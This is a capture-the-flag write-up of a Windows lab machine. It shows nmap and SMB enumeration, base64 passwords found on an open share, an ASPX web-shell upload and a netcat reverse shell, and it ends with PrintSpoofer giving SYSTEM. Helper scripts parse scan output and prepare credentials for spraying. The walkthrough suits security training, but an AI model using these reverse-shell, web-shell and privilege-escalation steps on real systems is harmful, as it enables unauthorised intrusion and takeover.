Relevant
Enumeration
Let's start with nmap and threader3000. I will use threader3000 to find all open ports first and then run nmap only against those, which keeps the service scan short:
------------------------------------------------------------
Threader 3000 - Multi-threaded Port Scanner
Version 1.0.7
A project by The Mayor
------------------------------------------------------------
Enter your target IP address or URL here: <MACHINE_IP>
------------------------------------------------------------
Scanning target <MACHINE_IP>
Time started: 2021-05-07 13:03:58.365964
------------------------------------------------------------
Port 139 is open
Port 80 is open
Port 135 is open
Port 445 is open
Port 3389 is open
Port 49663 is open
Port 49667 is open
Port 49669 is open
Port scan completed in 0:01:39.791011
nmap -sV -sC -p139,80,135,445,3389,49663,49667,49669 -oN nmapScan.txt <MACHINE_IP>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-07 13:07 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2021-05-07T17:09:00+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-05-06T16:58:58
|_Not valid after: 2021-11-05T16:58:58
|_ssl-date: 2021-05-07T17:09:40+00:00; +1s from scanner time.
49663/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h24m01s, deviation: 3h07m50s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-07T10:09:02-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-07T17:09:03
|_ start_date: 2021-05-07T16:59:34
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.79 seconds
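The sweep-then-scan workflow above, as an added example that is not part of the original writeup: a small POSIX shell helper that pulls the open ports out of threader3000 output (or out of nmap's grepable -oG output, if you do the full-port sweep with nmap -p- instead) and feeds them to the targeted service scan. The threader3000 lines are copied from the output above; the -oG line is constructed for illustration; open_ports and targeted_nmap are names I chose.

```sh
#!/bin/sh
# Added example: build the nmap -p list from a fast full-port sweep.

# Copied from the threader3000 run above (summary line included to show it is ignored).
THREADER_SAMPLE='Port 139 is open
Port 80 is open
Port 135 is open
Port 445 is open
Port 3389 is open
Port 49663 is open
Port 49667 is open
Port 49669 is open
Port scan completed in 0:01:39.791011'

# Constructed nmap -oG line (what "nmap -p- -oG sweep.gnmap <target>" writes); not from the page.
NMAP_G_SAMPLE='Host: 10.10.10.10 () Ports: 80/open/tcp//http///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8080/filtered/tcp//http-proxy/// Ignored State: closed (65530)'

# open_ports: read threader3000 ("Port N is open") or nmap -oG ("N/open/...") text on stdin and
# print a deduplicated, numerically sorted, comma-joined list for nmap -p. Returns 1 if none found.
open_ports() {
    ports=$(awk '
        /^Port [0-9]+ is open/ { print $2; next }
        {
            line = $0
            while (match(line, /[0-9]+\/open\//)) {
                print substr(line, RSTART, RLENGTH - 6)   # drop the trailing "/open/"
                line = substr(line, RSTART + RLENGTH)
            }
        }' | sort -nu | paste -sd, -)
    [ -n "$ports" ] || return 1
    printf '%s\n' "$ports"
}

# targeted_nmap <target> <sweep-output-file>: second stage, same nmap flags as the writeup.
targeted_nmap() {
    target=$1
    ports=$(open_ports < "$2") || { printf 'no open ports found in %s\n' "$2" >&2; return 1; }
    nmap -sV -sC -p "$ports" -oN nmapScan.txt "$target"
}

# Stand-alone demo: what each sample parses to.
printf '%s\n' "$THREADER_SAMPLE" | open_ports
printf '%s\n' "$NMAP_G_SAMPLE" | open_ports
```

Save the sweep to a file and call targeted_nmap <MACHINE_IP> sweep.txt; ports in any state other than exactly "open" (filtered, closed, open|filtered) are deliberately left out so the service scan stays small.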
So: an RDP server, two web servers and SMB. The RDP server looks like it is protected with a password, and both web servers show the default IIS page (TRACE method allowed but not much more), so let's check SMB.
SMB
I will use enum4linux to enumerate the service and get additional information beyond what nmap already gathered:
enum4linux -a -u guest -w WORKGROUP <MACHINE_IP>
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 7 12:09:27 2021
==========================
| Target Information |
==========================
Target ........... <MACHINE_IP>
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on <MACHINE_IP> |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for <MACHINE_IP> |
=============================================
Looking up status of <MACHINE_IP>
No reply from <MACHINE_IP>
======================================
| Session Check on <MACHINE_IP> |
======================================
[+] Server <MACHINE_IP> allows sessions using username 'guest', password ''
============================================
| Getting domain SID for <MACHINE_IP> |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on <MACHINE_IP> |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for <MACHINE_IP> from smbclient:
[+] Got OS info for <MACHINE_IP> from srvinfo:
<MACHINE_IP> Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003
==========================================
| Share Enumeration on <MACHINE_IP> |
==========================================
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on <MACHINE_IP>
//<MACHINE_IP>/ADMIN$ Mapping: DENIED, Listing: N/A
//<MACHINE_IP>/C$ Mapping: DENIED, Listing: N/A
//<MACHINE_IP>/IPC$ [E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
//<MACHINE_IP>/nt4wrksv Mapping: OK, Listing: OK
=====================================================
| Password Policy Information for <MACHINE_IP> |
=====================================================
[E] Unexpected error from polenum:
[+] Attaching to <MACHINE_IP> using guest
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:<MACHINE_IP>)
[+] Trying protocol 445/SMB...
[!] Protocol failed: rpc_s_access_denied
[E] Failed to get password policy with rpcclient
===============================
| Groups on <MACHINE_IP> |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on <MACHINE_IP> via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-5-21-3981879597-1135670737-2718083060
[I] Found new SID: S-1-5-82-3876422241-1344743610-1729199087-774402673
[I] Found new SID: S-1-5-82-3006700770-424185619-1745488364-794895919
[I] Found new SID: S-1-5-82-271721585-897601226-2024613209-625570482
[I] Found new SID: S-1-5-82-2094419441-2301267808-272098454-1219398644
[I] Found new SID: S-1-5-80-3139157870-2983391045-3678747466-658725712
[I] Found new SID: S-1-5-80
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username 'guest', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
Let's check that nt4wrksv share with a null session (-N means no password, which the session check above already showed is accepted): smbclient -N //<MACHINE_IP>/nt4wrksv. Once connected I found a file called passwords.txt, cool:
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Looks like base64 (the padding and alphabet give it away), so let's decode them:
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
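The decoding step above, as an added example that is not part of the original writeup: a POSIX shell function that turns the whole passwords.txt into user:password lines ready for a spray, instead of decoding each line by hand. The two base64 strings are the ones from the file above; the function name is mine. It also covers the failure mode a practitioner hits with files pulled off a Windows share: CRLF line endings, where the stray \r makes base64 -d fail with "invalid input".

```sh
#!/bin/sh
# Added example: decode the "[User Passwords - Encoded]" file found on the nt4wrksv share.

# The base64 lines are copied from passwords.txt above; the header line is reproduced as it
# appears in the file so the parser has something to skip.
ENCODED_CREDS='[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk'

# decode_creds: stdin = passwords.txt contents, stdout = one "user:password" line per entry.
# Strips a trailing \r (CRLF files), skips the header and blank lines, and warns on anything
# that is not base64 or does not decode to the "Name - password" shape instead of emitting garbage.
decode_creds() {
    cr=$(printf '\r')
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%"$cr"}
        case "$line" in
            '['* | '') continue ;;
        esac
        if ! decoded=$(printf '%s' "$line" | base64 -d 2>/dev/null); then
            printf 'skipping non-base64 line: %s\n' "$line" >&2
            continue
        fi
        case "$decoded" in
            *' - '*) ;;
            *) printf 'unexpected format after decoding: %s\n' "$decoded" >&2; continue ;;
        esac
        printf '%s:%s\n' "${decoded%% - *}" "${decoded#* - }"
    done
}

# Stand-alone demo, feeding the file with Windows line endings to show the \r handling.
printf '%s\n' "$ENCODED_CREDS" | awk '{ printf "%s\r\n", $0 }' | decode_creds
```

cut -d: -f1 and cut -d: -f2- on the output give a user list and a password list; spraying both against SMB and RDP is the obvious next step, and whatever the result, the usernames Bob and Bill are confirmed local accounts worth keeping.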
I tried the passwords but no luck; maybe they are valid usernames and the passwords are just stale. Let's check the web page.
http://MACHINE_IP/
gobuster couldn't find anything and nikto only reported the TRACE method I mentioned earlier as something "interesting", so let's check the other page.
http://MACHINE_IP:49663/
nikto only reported the TRACE method again, but gobuster reported the path /nt4wrksv, the same name as the SMB share. Maybe it is connected to it? I tried the path /nt4wrksv/passwords.txt and the page showed the file content, ok nice. So the SMB share and the IIS virtual directory point at the same folder on disk: whatever we can write over SMB, IIS will serve over HTTP, and if the extension is one IIS executes (.aspx) it will run it server-side.
Exploiting
RCE
We have write access to that share and IIS serves it, so... can we get RCE? I uploaded cmdasp.aspx (the classic ASPX web shell; Kali ships one under /usr/share/webshells/aspx/) and there it was, allowing me to execute commands, nice.
Now I will try to upload nc.exe to the share and get a proper reverse shell.
Reverse shell!
First I had to find the directory the share maps to; I was pretty lucky and found it fast:
dir C:\inetpub\wwwroot\nt4wrksv
Then, from the web shell:
nc.exe -e cmd.exe <Attacker_IP> <PORT>
with a netcat listener (nc -lvnp <PORT>) on our side. After some trial and error I tried port 443 to get past possible egress filtering, aaaand the shell came back, cool.
User flag
The user flag was in Bob's directory. Just run more C:\Users\Bob\Desktop\user.txt:
THM{*******************************}
Privesc
I tried to run winPEAS to check for privesc vectors but honestly it wasn't a good idea. I don't know why, but this box is really slow sometimes and it hung. Sooo I tried some manual enumeration:
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled <----
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
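The manual triage above, as an added example that is not part of the original writeup: a POSIX shell helper run on the attacker box against the copied whoami /priv output, flagging the privileges a service-account shell should look at first. The sample is the page's own output; the list of privileges to flag and the function name are mine. One caveat worth building in: "Disabled" in the State column only means the process has not turned the privilege on yet, a held privilege can be enabled by the process itself (AdjustTokenPrivileges), so state does not decide exploitability.

```sh
#!/bin/sh
# Added example: triage `whoami /priv` output for privileges that commonly lead to SYSTEM.

# Copied from the whoami /priv output above (the "<----" marker dropped).
PRIV_OUTPUT='PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled'

# Privileges worth flagging (my list, not from the page): the token-abuse pair that PrintSpoofer
# and the Potato family need, plus the usual file-system and kernel ones.
HIGH_VALUE_PRIVS='SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege SeBackupPrivilege
SeRestorePrivilege SeDebugPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege
SeTcbPrivilege SeCreateTokenPrivilege SeManageVolumePrivilege'

# triage_privs: stdin = whoami /priv output; stdout = "<privilege> <state>" for each held
# high-value privilege, in input order, regardless of state. Tolerates CRLF and trailing spaces.
triage_privs() {
    cr=$(printf '\r')
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%"$cr"}
        line=${line%"${line##*[! ]}"}   # trim trailing spaces
        case "$line" in
            Se*Privilege*) ;;
            *) continue ;;
        esac
        name=${line%% *}
        state=${line##* }
        for p in $HIGH_VALUE_PRIVS; do
            if [ "$name" = "$p" ]; then
                printf '%s %s\n' "$name" "$state"
            fi
        done
    done
}

# Stand-alone demo: flags SeAssignPrimaryTokenPrivilege (Disabled) and SeImpersonatePrivilege (Enabled).
printf '%s\n' "$PRIV_OUTPUT" | triage_privs
```

Paste the output of whoami /priv from the reverse shell into a file and run triage_privs < privs.txt; on this box both flagged privileges are the ones the IIS application pool identity gets by default, which is exactly why a web shell under IIS so often ends at SYSTEM.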
That SeImpersonatePrivilege looks interesting: a process holding it can take on the security context of any client that connects to it, which is what the Potato family and PrintSpoofer abuse (PrintSpoofer coerces the Print Spooler service into connecting to a named pipe the attacker controls, then impersonates the SYSTEM client). After searching a bit I found this exploit: https://github.com/itm4n/PrintSpoofer. I uploaded it to the machine and executed it from the share directory:
C:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
And yep, a SYSTEM shell, cool.
Root flag
Just run more C:\Users\Administrator\Desktop\root.txt:
THM{*******************************}